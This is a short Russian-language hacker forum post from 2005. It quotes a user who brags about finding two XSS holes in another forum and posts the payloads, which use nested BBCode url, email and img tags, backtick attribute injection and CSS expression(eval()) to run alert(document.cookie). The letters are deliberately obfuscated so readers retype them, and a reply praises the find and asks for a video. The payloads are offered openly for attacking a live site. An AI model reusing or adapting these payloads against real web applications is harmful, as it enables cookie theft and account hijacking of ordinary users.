02.04.2005, 22:59
|
|
Новичок
Регистрация: 05.02.2005
Сообщений: 4
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от KEZ
Мда... ну и форум.
В первыем минуты мне показалось что он сверх-защищеный. (по обилию тегов)
Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.
Код:
[urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));
[iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));
ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
ПЕРЕПИШИТЕ САМИ! Во, да ты дайшь басу  Буду ждать ролик! Респект. Я день потратил и ничего не нашёл 
Ссылочку на видео не забудь оставить 
|
|
|